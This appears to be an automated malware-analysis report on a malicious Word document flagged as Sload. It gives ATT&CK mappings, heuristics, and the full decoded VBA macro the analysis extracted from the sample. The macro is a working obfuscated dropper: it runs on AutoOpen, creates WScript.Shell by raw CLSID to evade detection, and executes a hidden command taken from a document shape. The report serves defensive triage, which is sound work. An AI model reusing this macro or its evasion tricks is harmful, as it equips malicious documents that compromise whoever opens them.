Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1218.005 System Binary Proxy Execution: Mshta
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on AutoOpen, indicating a malicious document. Critical heuristics indicate the use of WScript.Shell to instantiate a dangerous COM class and a reference to PowerShell. The obfuscated VBA code likely attempts to download and execute a second-stage payload, possibly using mshta.exe as suggested by the reconstructed command.
Heuristics (9)

- ClamAV: Doc.Malware.Sload-6791731-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sload-6791731-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID [critical] (OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script (with surrounding context): `Next Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB) On Error Resume Next`
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call
  Matched line in script (with surrounding context): `Next Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB) On Error Resume Next`
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script (with surrounding context): `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Reference to PowerShell [high] (SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8742 bytes |

SHA-256: da24bb15a60194cd66c5415a9e0e661d8a96b851fa45402824f8d4547a1e201d

Detection (extracted file)
- ClamAV: No threats found
- Obfuscation or payload: likely. 208 of 295 identifiers look randomly generated (e.g. 'osktKaFUXp'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vhzBiAsI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case izViuOZ
Case 268899346
maoSU = CBool(FvEonQo)
XoMRQ = 334475000
Case 245552943
EalQcfoGw = Atn(ElwQYj)
icAjK = Atn(119083460 * CLng(36534801))
End Select
For Each vwphzIqZv In OhDzZHz
WLDEGPfJi = kKtHfWh * CDate(wYAIOMCu * zDlCsi) * vtqqrZ / Sin(naTok) / GChPsIZ + 276062484 - 94294734 + Chr(322851336) + (BLEjFzTsc * MlfrpYW)
Next
On Error Resume Next
Select Case YoNTpTtW
Case 104436401
uPFEIBCIR = CBool(jjAECaEnu)
wPFiKo = 226015111
Case 299598317
UoibiaKR = Atn(GWvvSZDr)
IRPPFbAB = Atn(202386975 * CLng(67058912))
End Select
For Each tTSIWwJ In EVisI
hYTBzj = TAZbXFiC * CDate(dvzurmD * YVQwmSiZ) * uYDhz / Sin(drZTtjzq) / CdsisNc + 308353349 - 140745332 + Chr(210210827) + (bQhhhvC * KKzudO)
Next
On Error Resume Next
Select Case CjtjpObWC
Case 341386355
lXHNK = CBool(rwjAP)
bNXwWjG = 85682922
Case 205692240
jRarkLJVl = Atn(mNjnDjJ)
FitzmLSTR = Atn(117835737 * CLng(34744277))
End Select
For Each wmavqpnTV In mLPllNik
nWPHBwjfO = RtrQvhz * CDate(nwNvqVZr * hAZEpjYS) * jfZwHK / Sin(tEmvvUE) / aqnfrjui + 64035469 - 94693720 + Chr(10399320) + (oVbNSzb * UNopC)
Next
On Error Resume Next
Select Case tHIItZ
Case 218004345
bpAZta = CBool(aLiGBW)
SKmYUdz = 66299889
Case 80709632
jlpHMNRl = Atn(zzNvBszwa)
omfvR = Atn(265656441 * CLng(327590924))
End Select
For Each UFDPRdN In HkENzRUGX
FOkjWhX = YzDqY * CDate(Prwjrj * khLkNsML) * RYXmjjl / Sin(iVsRFNmR) / lwGUoP + 260287876 - 336874450 + Chr(139337713) + (ZvJpKpBi * SljjGIwV)
Next
Set uYSTEzWV = Shapes("IHEZACs")
On Error Resume Next
Select Case NjFXKkiWC
Case 325245663
ijjJPh = CBool(GKzSIh)
hBXUGohOf = 82251888
Case 24770817
bnpLULRCi = Atn(czitKTju)
YXjcjGBwI = Atn(219142162 * CLng(100636164))
End Select
For Each UFZGZ In zdGqfM
ZZlMiOikR = RuKFFSO * CDate(VPjHs * nlChR) * isUjJjQk / Sin(TjUCaHL) / LtLrhJ + 320707644 - 103654818 + Chr(115368512) + (bYsLAScw * aiwYCii)
Next
On Error Resume Next
Select Case QKjVz
Case 43045712
HBAuhFnUm = CBool(BrnpHObVV)
jBzcIqZbq = 17823492
Case 87185052
CJMtiuw = Atn(VjPiCDpUJ)
EAbLTGCYm = Atn(280736370 * CLng(209717939))
End Select
For Each ijmXoi In NkhWYZz
UZEBESuz = CqpGrF * CDate(IRJFf * iOLrwKXdC) * WUhwhpbt / Sin(lZVzoWVi) / OHPsGcu + 274905225 - 275560770 + Chr(83049922) + (jajzETm * GZSpP)
Next
On Error Resume Next
Select Case kPHwU
Case 188777673
HAvSTjX = CBool(vjVQMiM)
VTcqJ = 4474450
Case 194759069
wAPHfwhz = Atn(KiXJkNm)
OaCGW = Atn(79778352 * CLng(160164887))
End Select
For Each JmcrlNG In OUTRPzz
WoBwowlFq = vabZbnrj * CDate(JFHqzbA * PtUoQaDki) * biMBXB / Sin(SjvosfZfb) / tOzDVoBVM + 140016978 - 331826834 + Chr(201885707) + (YotcPBJHi * rfuEF)
Next
osktKaFUXp = "" + FRBbX + GwBjXQsz + lHjBa + kkPVINC + uYSTEzWV.TextFrame.TextRange.Text + DMPZwV + MjvpDN + NTtvCL
On Error Resume Next
Select Case WlGaJQQU
Case 14565301
pQzVwIHI = CBool(vWZwkfnW)
HwpjDbVw = 137995964
Case 212908756
SbaMIIzwi = Atn(jrvwMNw)
VuWudNFw = Atn(60217634 * CLng(81824038))
End Select
For Each ACnbMPU In NnciqsObF
jrOYHzlZY = NGJwkbiWt * CDate(ihsQjA * LjBPlAEZV) * bvopn / Sin(WiGidwPOr) / pLCwzpGF + 169325134 - 295893508 + Chr(146527766) + (bFFZPUCb * ZvqWi)
Next
On Error Resume Next
Select Case cczLfVbJ
Case 176276797
cJutZFsES = CBool(fiGMAqjv)
GGQrvnk = 247390719
Case 201777419
GGAzwktz = Atn(qhdFhj)
tVlKo = Atn(251584830 * CLng(211695749))
End Select
For Each TpMSzGpT In XMfilH
HsRFvcB = IstOATrT * CDate(TdJXbwL * NQhVD) * INJDvUa / Sin(rodJGNaT) / fsEKIwEfu + 43565885 - 27666506 + Chr(222339585) + (TNEVlB * QvzzimUtR)
Next
On Error Resume Next
Select Case fHzdMGW
Case 8242733
tRjuli = CBool(tKwFtPoC)
AdrmqkpH = 181229746
Case 321342769
ihAzmc = Atn(zABJXFC)
iwjkPTwzM = Atn(189022450 * CLng(202135788))
End Select
For Each aIccTo In FLJBTQ
qCiqGlkwC = arhuikoUH * CDate(wpYYqi * zhYuNTXd) * SVWtidFiC / Sin(HWXaUhL) / vBdGA + 152156923 - 316802110 + Chr(257970484) + (iwMYJR * STzOjSjp)
Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
On Error Resume Next
Select Case CElfaY
Case 62706517
CaRPXKYG = CBool(Jhjtd)
tzOwHF = 21487974
Case 92277803
wcvztY = Atn(bztaJnE)
vctXm = Atn(226330532 * CLng(228305583))
End Select
For Each YqriMa In dzMDQ
OaNhnGjzD = GsICf * CDate(fbfPIW * BqKAz) * bwjnLj / Sin(fqzbB) / UmkqDX + 149034467 - 117146679 + Chr(129961640) + (XAmrTLrc * ikcHX)
Next
Const ipSCmF = 0
On Error Resume Next
Select Case LZzww
Case 169309393
kimjfz = CBool(DGHzDZqt)
DaACsStw = 238053714
Case 209070610
jWGApIcPp = Atn(JhbTG)
dtiBRSut = Atn(146135219 * CLng(311932530))
End Select
For Each bRpqzAA In jAGHv
aDYutZimj = CFihOc * CDate(iulBwz * KhaLZj) * liEqOVz / Sin(Vopiant) / TtEncNK + 309255484 - 187528254 + Chr(26041690) + (kLwWM * sRWZqAGNB)
Next
On Error Resume Next
Select Case BfjhsItP
Case 201060592
YVUjLbB = CBool(muQfMlij)
YjADFbp = 257050929
Case 220102396
ilUZkNfSi = Atn(JmoaJFE)
WTwDIi = Atn(139072756 * CLng(234497440))
End Select
For Each VStfwdc In uSUjRhS
GTlrauAXV = OAbcpE * CDate(jJzpw * ILDOnj) * ElfICLjr / Sin(bSVJf) / bvRcPf + 229547790 - 161075755 + Chr(125047724) + (HFdfW * NoiLcVTa)
Next
On Error Resume Next
Select Case rVcHmVwLR
Case 165092232
uLpEivEJ = CBool(EOAbhMcA)
AZzjaHBtL = 327189517
Case 150085079
CThUzZpG = Atn(rufKqcVA)
ZtwTRzh = Atn(72769006 * CLng(249244612))
End Select
For Each CpjGnFBu In HimmuG
iTYki = slXdmjCh * CDate(onHDwIos * oiCtr) * GBMJUNmB / Sin(WwwiJ) / SslTuz + 205039892 - 278859205 + Chr(66489144) + (qaTvw * zukXlWt)
Next
On Error Resume Next
Select Case DjpozQb
Case 135559299
fzTwZPK = CBool(wWhWW)
abzATJwAG = 123948729
Case 250959929
uPbwvsO = Atn(hzpwfJ)
ZIsnw = Atn(219392154 * CLng(276894936))
End Select
For Each NzQHLi In rAKwUud
apIBJ = lDVKEXr * CDate(fntEzN * fkDqBGpmj) * JvFSzqfj / Sin(buuzGGnd) / WFQuPEv + 32917837 - 31400386 + Chr(75411343) + (XwQoW * cmuhzNXNm)
Next
On Error Resume Next
Select Case RfXPw
Case 331273846
clNNGdiE = CBool(ZkSWaP)
iVQRMCM = 5533935
Case 206096767
wLMaiaF = Atn(JAGJd)
kiqvqW = Atn(302174151 * CLng(227870935))
End Select
For Each Dotjj In ZZMijjT
luKNQROVZ = wjiMQKIcO * CDate(JlktY * jbtbtlRm) * BjJcQ / Sin(hPBizpNI) / ZHSKi + 2620546 - 67353657 + Chr(109089789) + (kimbzwNP * IPiwzzVbV)
Next
OXVvXFKL.Run# osktKaFUXp, ipSCmF
On Error Resume Next
Select Case jXVizq
Case 283743391
YUUXWNT = CBool(hipktz)
LQofBYn = 283266474
Case 299920648
lNObiG = Atn(bdoGA)
lFwHs = Atn(165923603 * CLng(142252333))
End Select
For Each VjwKNLL In BldbLkzF
zbjJPLTL = CaFQu * CDate(XhQdPQ * vzlbDdZ) * AFqXtzpUF / Sin(fwDIljk) / LDdUWpSij + 232538690 - 156906645 + Chr(261687065) + (plOBU * tBUiNK)
Next
On Error Resume Next
Select Case MtwwGaiM
Case 243799386
Ntjrk = CBool(hBBMbdsj)
Ddscij = 105893297
Case 74548497
MztjXZjEX = Atn(fBvIcSz)
jLMjBSdDw = Atn(248919421 * CLng(236078397))
End Select
For Each Zzhhf In mzicfWFX
SIVQK = ljzmcvb * CDate(TduVQ * hUNcpjBQG) * qdiQKvaV / Sin(bnQhuDr) / rKzlBo + 178358327 - 132519088 + Chr(334010902) + (tbdcVaUwz * KvYCYv)
Next
End Sub